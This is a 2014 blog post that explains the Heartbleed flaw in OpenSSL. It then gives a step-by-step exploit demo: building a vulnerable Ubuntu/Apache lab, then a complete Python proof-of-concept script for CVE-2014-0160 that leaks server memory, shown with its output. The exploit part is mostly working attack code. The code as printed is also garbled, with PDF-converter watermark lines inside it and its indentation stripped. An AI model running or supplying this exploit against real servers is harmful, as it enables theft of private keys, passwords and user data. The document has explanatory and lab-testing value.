Monday, 28 April 2014

::: How to exploit Heartbleed Vulnerability & Demo PART 1 :::




Before showing demo, let’s go for some explanation about it.
 
Q) What is SSL?
SSL stands for Secure Sockets Layer. It is an industry standard technology used for establishing a secure connection between two points, and encrypting the traffic that passes between them. In theory, SSL protects the data passed between a Web server and browser from being accessed or intercepted.

Q) What is OpenSSL?
OpenSSL is an open-source implementation of the SSL and TLS protocols. The core library, written in the C programming language, implements the basic cryptographic functions and provides various utility functions. Wrappers allowing the use of the OpenSSL library in a variety of computer languages are available.

Source: Wikipedia.com

Q) What is “Heartbeat” extension?
The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation and a basis for path MTU (PMTU) discovery for DTLS.

Q) About Heartbeat bug?
Millions of websites may have been leaking critically sensitive data for the past two years, thanks to a devastating flaw in the OpenSSL software many sites use to encrypt and transmit data.

The Heartbleed bug, as it’s called by the researchers who discovered it, would let anyone on the Internet get into a supposedly secure Web server running certain versions of OpenSSL and scoop up the site’s encryption keys, user passwords and site content.
Once an attacker has a website’s encryption keys, anything is fair game: Instead of slipping through a proverbial crack in the wall, he can now walk in and out the front door.

There have been no documented instances of attacks exploiting the Heartbleed bug. But because an attack using the bug would leave no trace, and the potential damage from an attack would be so significant, all websites that ever used the affected versions of OpenSSL should be considered compromised.

Top sites — including Facebook, Google, Wikipedia, Amazon, Twitter, Apple and Microsoft — are not currently vulnerable, though some may have been in the past.


Q) How the Hearbleed bug works?
Most secure websites encrypt traffic to and from their servers using a protocol called SSL/TLS. There are several different encryption “libraries” that can be used in this protocol, and one of the most widely used is an open-source library called OpenSSL.

The Heartbleed bug is in versions of OpenSSL issued from December 2011 onward, not in SSL/TLS itself. Not every instance of SSL or TLS encryption across the Internet is compromised. But OpenSSL is the default encryption library in Apache and Nginx server software, which power two-thirds of all websites.

An attack exploiting the Heartbleed bug would leave no trace in an attacked Web server’s logs. It’s impossible to tell how many sites, if any, may have been exploited, and how many may have been vulnerable over the past two years.

Neel Mehta of Google Security and a team of engineers at Oulu, Finland-based security company Codenomicon first discovered the Heartbleed bug, though they haven’t specified when. They’ve created a FAQ page at heartbleed.com with full details.

The bug’s name refers to a handshake (process of connecting to a network) in OpenSSL’s code called the “heartbeat extension,” which sets a limit on how long an encrypted session stays valid. A coding error meant that the extension was missing a necessary verification (called a bounds check), thus giving an attacker access to additional information about the server and creating the vulnerability.

The most recent version of OpenSSL, 1.0.1g, patches the flaw, so any websites running OpenSSL should upgrade to the newest version immediately.

However, the damage has been done. Versions of OpenSSL with the bug have been in use for more than two years. If an attacker used the Heartbleed bug to get into a Web server, he would have access to the website’s “crown jewels”: its encryption keys.

With the keys, attackers could decrypt traffic to and from the server; impersonate the server so that users who think they’re visiting a given website are actually visiting a fraudulent site disguised as the correct one; or decrypt the server’s databases, including their users’ personal information, such as usernames, passwords, email addresses, payment information and more.

Web servers that use or used vulnerable versions of OpenSSL need to do more than upgrade to the latest version of OpenSSL; they also need to revoke and reissue all of their encryption certificates. It’s no use boarding up a hole in the wall if the intruders can now let themselves in through the front door.

Q) Who is Affected?
Administrators of websites using Apache or Nginx server software need to evaluate whether they have, or had used, vulnerable versions of OpenSSL. Such websites should be considered compromised.

OpenSSL is also incorporated into email servers using the SMTP, POP and IMAP protocols; chat servers using the SMPP protocol; and most virtual private networks (VPNs) that use SSL to protect their networks.

Want to check if an individual Web domain is affected?
Check your domain is safe from heartbleed by typing your domain name in the below URL.

Q) What should you do?
Unless you’re a system administrator, there’s not much you can do right now. We can’t even recommend that you change your online passwords — not yet, at least. If a website hasn’t upgraded its OpenSSL library and changed its encryption certificates, then a new password would be just as compromised as an old one.

The vulnerable versions of OpenSSL are 1.0.0 through 1.0.1f. If you’re a website administrator and can’t upgrade to the newest version, then you can manually disable the heartbeat function and then recompile OpenSSL’s code.

It’s Show Time !!!

Many people requested me to provide heartbleed exploit demo. So here your wait ends and lets have some action.

Prerequisites:
1.      VMware Workstation or Virtual Box.
2.      Ubuntu  12.04 ISO

I hope you know how to run Ubuntu in virtual machine … I’m just kidding :P   … If you don’t Google it…
Step 1: I downloaded a Ubuntu 12.04 ISO, which has a default version of OpenSSL of 1.0.1, and which is vulnerable to HeartBleed.

Step 2: Next I'll install Apache, SSL and accpet the default Ubuntu certificate.

Step 3: Run the Ubuntu machine and open the terminal  and type the below commands

#sudo apt-get install apache2
#sudo a2enmode ssl
#service apache2 restart
#service apache2 status
#sudo a2ensite default-ssl
#service apache2 reload
#service apache2 restart

I hope you done exactly, what I’ve done r8

This will create a Web server which uses https on Port 443. In the demo I run the Ubuntu server in VMware Workstation at IP 192.168.61.131.

Step 4: Check your OpenSSL version and other information.

#openssl version  –a
OpenSSL 1.0.1 28 Apr 2014

Step 5: Next a Web connection is used to verifiy the connection, after which the following commands can be used to access the server.

#openssl s_client  –connect 192.168.61.131:443 –tlsextdebug
CONNECTED(00000003)
TLS server extension "renegotiation info" (id=65281), len=1
0001 - <SPACES/NULS>
TLS server extension "session ticket" (id=35), len=0
TLS server extension "heartbeat" (id=15), len=1   ß Vulnerability
0000 - 01                                                .
depth=0 CN = ubuntu
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = ubuntu
verify return:1
---
Certificate chain
 0 s:/CN=ubuntu
   i:/CN=ubuntu
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICnjCCAYYCCQDWrFwbrAxohjANBgkqhkiG9w0BAQUFADARMQ8wDQYDVQQDEwZ1
YnVudHUwHhcNMTQwNDI1MTY0NjA2WhcNMjQwNDIyMTY0NjA2WjARMQ8wDQYDVQQD
EwZ1YnVudHUwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCgXGIPBKLo
h31pJ4a/uGATJpiK4PyDBdgOofjvnptF6VLsAbYPQ3sLzTBa2KsydYnd31TZDcsX
tOvghN0Ou601+IB5mMj00qQR9gpokKKYz7jioQkHaH0qb41HjPQzTHewpSsJXxsR
rI3jwAYUGtDhlgRU9v21V0G3CprxUmRpF9xIGspw0k88gNa2hfLrQg6AuOSXNuhc
bRKjNu712eDY7TnV1XIBwLd5L38jh87mKoV4UzPVmBUCcCDsqsHl07lQiy0/UGWu
AqwtDbuSLRh5sKSBaIRPJOwvhhQ0sBjr1Z+OvmaSTtAt5L+N0Ta7qBUOTQwEhL5q
iUBeshYCXd73AgMBAAEwDQYJKoZIhvcNAQEFBQADggEBAJmK8K1cW4EoTNMPRD9/
Zcf8llfIIgXPj0ZrsL64EGlIICTX05nUBdNoUaoL+Ivii94flEeI/sr6UvFcc4uC
DITICRn7n87kbF95tLBV+303dfPautUlP19qe7N9XPQW4/nWnkqeRjInbdyKtxNr
r0hHOwHeXnDBBBP1pCn3c1b84Yfc+S+ouNm//CmvlL+ublErlBnqU9Sg+7VoKbHn
NNhCmRK2SyR1K4FsFyGa+gu1Ii7PGDXZOI5hBjLtTe31yf9wZl71iHw+9Uj1h01O
W2g2cpOrRbinTN7lOLg3u9v0RCeqSfjUEBe1tjqxLjn6O7EoJeaan5AdYPPzWBjG
mKY=
-----END CERTIFICATE-----
subject=/CN=ubuntu
issuer=/CN=ubuntu
---
No client certificate CA names sent
---
SSL handshake has read 1573 bytes and written 439 bytes
---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.1
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 9206481F74BE3E642870690D7484AD773C3D1265193DE87A2D1353B8D80893E5
    Session-ID-ctx:
    Master-Key: D8DA9DDF1019EB7FCB96A978DE628B33D41BA7869385A5B5F55DB537E829D00A902EABEAE8C0B30804AC931A6A3E9E54
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - fc ae af 70 83 3d 13 5d-01 75 11 9b 25 d6 56 36   ...p.=.].u..%.V6
    0010 - 8b cf f5 53 d1 22 3f fd-d9 88 d2 77 21 d1 8b af   ...S."?....w!...
    0020 - 0e f1 5a 27 99 f9 b4 7f-06 c0 48 cd c9 e5 11 38   ..Z'......H....8
    0030 - 34 73 bb c7 40 6a 01 cd-4e d0 2c 76 60 4e 47 75   4s..@j..N.,v`NGu
    0040 - 1c 13 29 a8 52 de ae 86-90 5e ce df 83 fc eb 9e   ..).R....^......
    0050 - 52 2c 5b 8b 02 c6 b3 44-25 64 01 81 1b f3 41 15   R,[....D%d....A.
    0060 - e7 5c b1 d4 e4 be ab 63-03 a9 f0 2c 76 d8 79 bb   .\.....c...,v.y.
    0070 - 67 84 99 50 b0 39 60 0e-69 ac 2e b7 14 3a 10 16   g..P.9`.i....:..
    0080 - 44 02 35 19 96 ce 47 9a-18 39 8f 3e e1 6e 2b 47   D.5...G..9.>.n+G
    0090 - f1 f7 ca a6 fe 35 69 ed-e6 6b 56 dc 88 f3 48 60   .....5i..kV...H`
    00a0 - 3c 39 d2 1a 74 ae f3 62-58 6d 2e 2d ee 30 12 d6   <9..t..bXm.-.0..
    00b0 - a5 1e 84 54 71 fe 22 a7-08 7c 81 16 09 9c 67 91   ...Tq."..|....g.

    Start Time: 1398683776
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)
---

Step 6:  Copy the below python script in the editor and save it as hb_exploit.py
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
import smtplib
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulne
rability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulne
rable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped me
mory too (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='s
tore_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (sm
tp only right now)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
conve rte d by We b2PDFC onve rt.com
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')
hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')
hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')
def hexdump(s, dumpf, quiet):
dump = open(dumpf,'a')
dump.write(s)
dump.close()
if quiet: return
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
if not rdata:
return None
else:
return rdata
r, w, e = select.select([s], [], [], 5)
conve rte d by We b2PDFC onve rt.com
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s, dumpf, host, quiet):
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received from '+host+', server likely not vulnerable'
return False
if typ == 24:
if not quiet: print 'Received heartbeat response:'
hexdump(pay, dumpf, quiet)
if len(pay) > 3:
print 'WARNING: server '+ host +' returned more data than it should - server is vulnera
ble!'
else:
print 'Server '+host+' processed malformed heartbeat, but did not return any extra dat
a.'
return True
if typ == 21:
if not quiet: print 'Received alert:'
hexdump(pay, dumpf, quiet)
print 'Server '+ host +' returned error, likely not vulnerable'
return False
def connect(host, port, quiet):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if not quiet: print 'Connecting...'
sys.stdout.flush()
s.connect((host, port))
return s
conve rte d by We b2PDFC onve rt.com
def tls(s, quiet):
if not quiet: print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
if not quiet: print 'Waiting for Server Hello...'
sys.stdout.flush()
def parseresp(s):
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return 0
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
return ver
def check(host, port, dumpf, quiet, starttls):
response = False
if starttls:
try:
s = smtplib.SMTP(host=host,port=port)
s.ehlo()
s.starttls()
except smtplib.SMTPException:
print 'STARTTLS not supported...'
s.quit()
return False
print 'STARTTLS supported...'
s.quit()
s = connect(host, port, quiet)
s.settimeout(1)
try:
re = s.recv(1024)
s.send('ehlo starttlstest\r\n')
re = s.recv(1024)
s.send('starttls\r\n')
re = s.recv(1024)
except socket.timeout:
print 'Timeout issues, going ahead anyway, but it is probably broken ...'
tls(s,quiet)
else:
s = connect(host, port, quiet)
tls(s,quiet)
version = parseresp(s)
if version == 0:
if not quiet: print "Got an error while parsing the response, bailing ..."
return False
else:
conve rte d by We b2PDFC onve rt.com
version = version - 0x0300
if not quiet: print "Server TLS version was 1.%d\n" % version
if not quiet: print 'Sending heartbeat request...'
sys.stdout.flush()
if (version == 1):
s.send(hbv10)
response = hit_hb(s,dumpf, host, quiet)
if (version == 2):
s.send(hbv11)
response = hit_hb(s,dumpf, host, quiet)
if (version == 3):
s.send(hbv12)
response = hit_hb(s,dumpf, host, quiet)
s.close()
return response
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
print 'Scanning ' + args[0] + ' on port ' + str(opts.port)
for i in xrange(0,opts.num):
check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)
if __name__ == '__main__':
main()

Step 7: Next we run the python script hb_exploit.py to capture the running memory from the server.

#chmod a+x hb_exploit.py
#ls
hb_exploit.py
#python hb_exploit.py 192.168.61.131
Scanning 192.168.61.131 on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 58
 ... received message: type = 22, ver = 0302, length = 684
 ... received message: type = 22, ver = 0302, length = 525
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2

Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 00 00 00 00  ....#...........
  00e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  00f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................

WARNING: server 192.168.61.131 returned more data than it should - server is vulnerable!

Thus we can see the memory of the server, with running keys.

Step 8: Save the captured memory in hbdump.txt
#python hb_exploit.py 192.168.61.131 > hbdump.txt
#nano hbdump.txt (You can use any editor to view the file vi,pico,gedit etc)

I hope you will like it ...

Follow me on twitter